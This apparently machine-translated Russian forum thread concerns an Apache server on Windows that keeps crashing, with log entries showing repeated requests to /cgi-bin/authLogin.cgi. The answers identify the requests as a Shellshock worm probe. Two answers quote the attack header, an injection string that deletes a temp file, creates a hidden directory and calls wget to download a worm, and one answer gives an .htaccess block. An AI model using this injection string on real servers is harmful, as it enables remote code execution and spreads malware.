Сервер Apache http перестал работать

Question

Сервер Apache http перестал работать

Привет, друзья,

Я использую сервер Ampps с php 5.3.29 в центре данных сервера Windows.

к сожалению, я получаю следующее приглашение на сервере Windows и мой сайт не работает.

Название подсказки: Microsoft Windows

Подсказка: http-сервер Apache перестал работать.

Из-за проблемы программа перестала работать правильно. Windows закроет программу и уведомит вас, если решение доступно.

Трассировка:

Когда я отслеживал ошибки и обращался к журналам, я нашел следующие журналы как причину.

В журнале доступа Apache:

202.175.83.36 - - [10 / Dec / 2014: 05: 58: 50 -0500] "GET /cgi-bin/authLogin.cgi HTTP / 1.1" 404 1335 217.248.177.30 - - [10 / Dec / 2014: 06: 11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP / 1.1" 404 1335 209.153.244.6 - - [10 / Dec / 2014: 07: 09: 17 -0500] "GET / cgi-bin / authLogin.cgi HTTP / 1.1 "404 1335 81.214.132.245 - - [10 / Dec / 2014: 07: 25: 04 -0500]" GET /cgi-bin/authLogin.cgi HTTP / 1.1 "404 1335

В журнале ошибок Apache:

[Ср. 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [клиент 81.214.132.245:36246] сценарий не найден или не может выполнить статистику: D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi

Пожалуйста, помогите мне.

1

php apache ampps

Источник

user2077733 10 дек '14 в 13:09

4 ответа

Другие вопросы по тегам php apache ampps

user4364739 16 дек '14 в 03:06 2014-12-16 03:06 · Answer 1 · 2014-12-16 03:06

Есть веб-бот, пытающийся получить полномочия, чтобы он мог wget и выполнить что-то вроде S0.py, который, как мне кажется, является червем, поэтому сервер загрузки скомпрометирован. Я хотел бы получить копию S0.sh, если вы случайно ее получили, и дайте ей использовать exploit-db или что-то в этом роде. Умная команда: Get /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() {:; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

Файл выполняется после загрузки. Я полагаю, что-то есть в HDB_DATA, чего у меня даже нет. "Информация имеет первостепенное значение!"

user2077733 10 дек '14 в 13:51 2014-12-10 13:51 · Answer 2 · 2014-12-10 13:51

Наконец я запретил этим клиентам доступ к каталогу cgi-bin.

в каталоге cgi-bin я создал файл.htaccess

Я добавил следующую строку в.htaccess

Отрицать все.

0

Источник

user2077733 10 дек '14 в 13:51

user2772889 10 дек '14 в 13:12 2014-12-10 13:12 · Answer 3 · 2014-12-10 13:12

Если вы попытаетесь открыть этот файл, что произойдет?

D: / Program Files / Ampps / www / cgi-bin / authLogin.cgi

Сообщение указывает, что файл не существует, на что указывает ошибка 404 и сообщение "скрипт не найден".

0

Источник

user2772889 10 дек '14 в 13:12

user7154635 14 ноя '16 в 01:01 2016-11-14 01:01 · Answer 4 · 2016-11-14 01:01

Я не думаю, что authLogin.cgi действительно имеет значение, кроме того, что он может позволить кому-то выполнить. Проблема в том, что пользователь пытается или успешно удаляет /tmp/S0.sh и создает каталог php в папке общего доступа, а затем выполняет wget.

/ bin / rm -rf /tmp/S0.sh && / bin / mkdir -p /share/HDB_DATA/.../php && / usr / bin / wget

Вот что пришло в голову после всего этого времени удивления: http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html

"S0.sh состоит из двух основных частей... первая часть выполняет первоначальную настройку и загружает дополнительные программы, а затем вторая часть устанавливает червя и выполняет некоторые дополнительные команды".

Так что ловить это действие было настоящим праздником, и поначалу никто не знал, что это Шеллшок. Там есть копия S0.sh, и вы можете видеть, что это червь, как я и предполагал.

Из того, что я прочитал, червь просто просматривает пространство IP в поисках любого, кто слушает порт 8080.